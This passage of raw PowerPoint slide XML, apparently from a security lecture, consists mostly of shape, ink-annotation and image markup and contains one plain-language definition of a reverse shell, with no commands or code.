            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse shell is getting the connection from the victim or target to your computer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8590663" y="6041362"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>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343087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AF44B25-39B4-EDD2-4140-16B3F7C3CE8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1836292" y="4126517"/>
            <a:ext cx="7753680" cy="1369800"/>
            <a:chOff x="1836292" y="4126517"/>
            <a:chExt cx="7753680" cy="136980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F9FB33B-E9EA-E8FB-D34D-41695C035B55}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1836292" y="4249637"/>
                <a:ext cx="7681680" cy="971280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9FB33B-E9EA-E8FB-D34D-41695C035B55}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1818292" y="4231997"/>
                  <a:ext cx="7717320" cy="10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47A0012-B335-1771-B812-93AD13ED98B3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9307732" y="4126517"/>
                <a:ext cx="282240" cy="327960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="5" name="Ink 4">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{147A0012-B335-1771-B812-93AD13ED98B3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9289732" y="4108517"/>
                  <a:ext cx="3178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579FA74-FCDA-31DA-502D-352D9E90BA49}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7619692" y="5353397"/>
                <a:ext cx="360" cy="102600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="6" name="Ink 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4579FA74-FCDA-31DA-502D-352D9E90BA49}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7601692" y="5335397"/>
                  <a:ext cx="36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F5A0F89-9C55-CFE0-5C5F-FF2FF6652324}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7494772" y="5243597"/>
                <a:ext cx="437040" cy="252720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F5A0F89-9C55-CFE0-5C5F-FF2FF6652324}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7476772" y="5225597"/>
                  <a:ext cx="472680" cy="288360"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527AD5DD-B295-2283-C83A-4CCA76091787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1685812" y="2961197"/>
            <a:ext cx="7528320" cy="735840"/>
            <a:chOff x="1685812" y="2961197"/>
            <a:chExt cx="7528320" cy="73584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BE43208-63F1-0F25-9853-8A3970CEA455}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1798132" y="2961197"/>
                <a:ext cx="7416000" cy="689040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE43208-63F1-0F25-9853-8A3970CEA455}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1780492" y="2943197"/>
                  <a:ext cx="74516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A560197-D065-9045-D9BD-8A5FDAC98D00}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1685812" y="3430637"/>
                <a:ext cx="260640" cy="266400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="10" name="Ink 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA560197-D065-9045-D9BD-8A5FDAC98D00}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId17"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1667812" y="3412997"/>
                  <a:ext cx="296280" cy="302040"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{334429DB-D5AE-4151-27CC-E1B608364EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6009412" y="2414357"/>
            <a:ext cx="439560" cy="385200"/>
            <a:chOff x="6009412" y="2414357"/>
            <a:chExt cx="439560" cy="385200"/>
          </a:xfrm>
        </p:grpSpPr>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990DE07-2B7F-B1C6-458F-62A54B9D7768}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6118852" y="2561957"/>
                <a:ext cx="175320" cy="185040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="12" name="Ink 11">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9990DE07-2B7F-B1C6-458F-62A54B9D7768}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6101212" y="2544317"/>
                  <a:ext cx="2109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8FF1866-BB77-C985-BA9D-746090F9E9FC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6009412" y="2414357"/>
                <a:ext cx="439560" cy="385200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FF1866-BB77-C985-BA9D-746090F9E9FC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5991412" y="2396357"/>
                  <a:ext cx="475200" cy="420840"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Right Arrow 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8730BDB-793B-1014-8282-8B952393E214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237964" y="5994394"/>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7" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CC032C4-89B7-DB99-ABC3-16D128B777F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835276" y="5584025"/>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127055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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E0BAF26-E70C-32CD-85C5-348CA092D882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2202412" y="69317"/>
            <a:ext cx="322920" cy="321480"/>
            <a:chOff x="2202412" y="69317"/>
            <a:chExt cx="322920" cy="32148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06AB91-F5ED-D09C-5416-1C1790B0E281}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2344252" y="210437"/>
                <a:ext cx="23760" cy="155880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A806AB91-F5ED-D09C-5416-1C1790B0E281}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2326612" y="192797"/>
                  <a:ext cx="59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45D203D-AA7B-0F29-F1BC-67818FB7E702}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2202412" y="69317"/>
                <a:ext cx="322920" cy="321480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="4" name="Ink 3">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{745D203D-AA7B-0F29-F1BC-67818FB7E702}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2184772" y="51677"/>
                  <a:ext cx="358560" cy="357120"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ADB0E17-734B-35F4-0483-1C8BF150F094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3133732" y="273437"/>
            <a:ext cx="5042880" cy="1345320"/>
            <a:chOff x="3133732" y="273437"/>
            <a:chExt cx="5042880" cy="134532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D55B8C8-DFC8-D328-CFE5-E0EF67763EAD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3133732" y="273437"/>
                <a:ext cx="4656600" cy="1259280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="8" name="Ink 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD55B8C8-DFC8-D328-CFE5-E0EF67763EAD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3115732" y="255437"/>
                  <a:ext cx="4692240" cy="129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0E44AA8-E4AB-D84B-6D7C-19B58426C5FD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7675492" y="1320677"/>
                <a:ext cx="162360" cy="298080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E44AA8-E4AB-D84B-6D7C-19B58426C5FD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7657852" y="1302677"/>
                  <a:ext cx="1980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55186A4-12A8-0F06-BD98-3C1C19E10B26}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7877452" y="892277"/>
                <a:ext cx="147600" cy="241560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55186A4-12A8-0F06-BD98-3C1C19E10B26}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7859812" y="874277"/>
                  <a:ext cx="1832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8D4E8F2B-787C-FA74-48A6-FB09DCB8EB0E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7727692" y="765557"/>
                <a:ext cx="448920" cy="477360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4E8F2B-787C-FA74-48A6-FB09DCB8EB0E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7710052" y="747557"/>
                  <a:ext cx="484560" cy="513000"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E695CFF-1D2C-4273-1C31-6D7D48FECC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1822252" y="718757"/>
            <a:ext cx="5547600" cy="1025280"/>
            <a:chOff x="1822252" y="718757"/>
            <a:chExt cx="5547600" cy="1025280"/>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89453CD5-A27C-BEEA-1C3C-25033544C231}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1894612" y="859157"/>
                <a:ext cx="5475240" cy="884880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="19" name="Ink 18">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89453CD5-A27C-BEEA-1C3C-25033544C231}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId17"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1876972" y="841157"/>
                  <a:ext cx="551088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F38F2D8-6546-53E9-AA19-8B251B406328}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1822252" y="718757"/>
                <a:ext cx="123840" cy="248400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="20" name="Ink 19">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F38F2D8-6546-53E9-AA19-8B251B406328}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1804252" y="700757"/>
                  <a:ext cx="159480" cy="284040"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760F4072-955C-7D20-F667-223D0A0BB030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2609572" y="577637"/>
            <a:ext cx="322200" cy="517680"/>
            <a:chOff x="2609572" y="577637"/>
            <a:chExt cx="322200" cy="5176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8975A4BB-7325-6AFE-302E-B6E9D7FF22F8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2719372" y="758717"/>
                <a:ext cx="158760" cy="268200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="22" name="Ink 21">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8975A4BB-7325-6AFE-302E-B6E9D7FF22F8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2701732" y="741077"/>
                  <a:ext cx="1944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390D2FF0-33B9-0789-38EE-9B33CFC3C6EC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2609572" y="577637"/>
                <a:ext cx="322200" cy="517680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="23" name="Ink 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390D2FF0-33B9-0789-38EE-9B33CFC3C6EC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId23"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2591932" y="559997"/>
                  <a:ext cx="357840" cy="55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827DF6C7-4049-53AB-E939-22D611165851}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11503732" y="3296357"/>
              <a:ext cx="360" cy="1800"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Ink 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827DF6C7-4049-53AB-E939-22D611165851}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
